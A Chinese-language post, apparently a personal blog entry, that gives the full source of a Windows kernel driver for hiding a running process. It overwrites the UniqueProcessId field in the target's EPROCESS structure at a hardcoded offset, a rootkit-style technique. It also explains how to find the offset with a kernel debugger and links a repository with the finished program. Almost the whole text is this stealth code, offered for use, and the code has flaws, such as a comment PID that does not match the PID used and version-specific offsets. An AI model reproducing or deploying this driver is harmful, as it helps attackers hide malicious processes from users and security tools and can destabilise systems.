驱动隐藏进程 （本人手写）

#include <ntifs.h> #include <ntddk.h> #include <wdm.h> // 使用动态获取偏移的方法，而不是硬编码 typedef struct _PROCESS_INFO { ULONG UniqueProcessIdOffset; } PROCESS_INFO; // 全局变量 PROCESS_INFO g_ProcessInfo = { 0 }; // 函数声明 VOID DriverUnload(PDRIVER_OBJECT DriverObject); NTSTATUS GetProcessIdOffset(PULONG pOffset); NTSTATUS HideProcessById(HANDLE ProcessId); #pragma comment(lib, "ntoskrnl.lib") // 驱动入口点 NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { UNREFERENCED_PARAMETER(RegistryPath); NTSTATUS status = STATUS_SUCCESS; DbgPrint("[DriverEntry] Driver loaded\n"); // 设置卸载函数 DriverObject->DriverUnload = DriverUnload; // 获取UniqueProcessId的偏移量 status = GetProcessIdOffset(&g_ProcessInfo.UniqueProcessIdOffset); if (!NT_SUCCESS(status)) { DbgPrint("[DriverEntry] Failed to get process ID offset: 0x%X\n", status); return status; } DbgPrint("[DriverEntry] UniqueProcessId offset: 0x%X\n", g_ProcessInfo.UniqueProcessIdOffset); // 隐藏目标进程（示例：隐藏进程ID 1234） HANDLE targetProcessId = (HANDLE)4616; status = HideProcessById(targetProcessId); if (NT_SUCCESS(status)) { DbgPrint("[DriverEntry] Successfully modified process with ID %lu\n", (ULONG)targetProcessId); } else { DbgPrint("[DriverEntry] Failed to modify process with ID %lu (Status: 0x%X)\n", (ULONG)targetProcessId, status); } return STATUS_SUCCESS; } // 获取EPROCESS中UniqueProcessId的偏移量 NTSTATUS GetProcessIdOffset(PULONG pOffset) { PEPROCESS pSystemProcess = NULL; HANDLE pid = (HANDLE)4; // System进程的PID通常为4 NTSTATUS status = PsLookupProcessByProcessId(pid, &pSystemProcess); if (!NT_SUCCESS(status)) { DbgPrint("[GetProcessIdOffset] Failed to lookup System process: 0x%X\n", status); return status; } // 获取EPROCESS结构体中的UniqueProcessId字段 // 这里使用更安全的方法，但需要包含Ps.h中的声明 // 在实际驱动中，可能需要使用模式扫描或特征码定位 // 临时使用已知偏移（应该通过模式扫描动态获取） // Windows版本不同，偏移量也不同，这里只是示例 #ifdef _WIN64 * pOffset = 0x1d0; // 64位系统的常见偏移 #else * pOffset = 0x180; // 32位系统的常见偏移 #endif ObDereferenceObject(pSystemProcess); return STATUS_SUCCESS; } // 隐藏指定PID的进程 NTSTATUS HideProcessById(HANDLE ProcessId) { PEPROCESS pEprocess = NULL; NTSTATUS status = STATUS_SUCCESS; // 查找目标进程 status = PsLookupProcessByProcessId(ProcessId, &pEprocess); if (!NT_SUCCESS(status)) { DbgPrint("[HideProcessById] Failed to find process with ID %lu: 0x%X\n", (ULONG)ProcessId, status); return status; } // 安全地修改UniqueProcessId // 使用正确的指针算术和类型转换 ULONG_PTR processAddress = (ULONG_PTR)pEprocess; // 获取UniqueProcessId指针 PHANDLE pUniqueProcessId = (PHANDLE)(processAddress + g_ProcessInfo.UniqueProcessIdOffset); DbgPrint("[HideProcessById] Process EPROCESS: 0x%p, UniqueProcessId: 0x%p -> %lu\n", pEprocess, pUniqueProcessId, (ULONG)*pUniqueProcessId); // 将UniqueProcessId设为0（隐藏进程） // 注意：这只是一个简单的示例，实际隐藏进程需要更多步骤 *pUniqueProcessId = (HANDLE)0; DbgPrint("[HideProcessById] Modified UniqueProcessId to 0\n"); // 释放EPROCESS引用 ObDereferenceObject(pEprocess); return STATUS_SUCCESS; } // 驱动卸载函数 VOID DriverUnload(PDRIVER_OBJECT DriverObject) { UNREFERENCED_PARAMETER(DriverObject); DbgPrint("[DriverUnload] Driver unloading\n"); // 这里可以添加恢复被隐藏进程的代码 // 在实际驱动中，需要维护被隐藏进程的列表以便恢复 DbgPrint("[DriverUnload] Driver unloaded successfully\n"); }

对于 目标pid 和 偏移值 需要输入，目标pid就不用说了，

偏移值UniqueProcessIdOffset在调试内核时使用: dt _EPROCESS 命令查看

https://gitee.com/geek-mm/system-permission-loader

这是本人做的东西，代码和程序全部上传。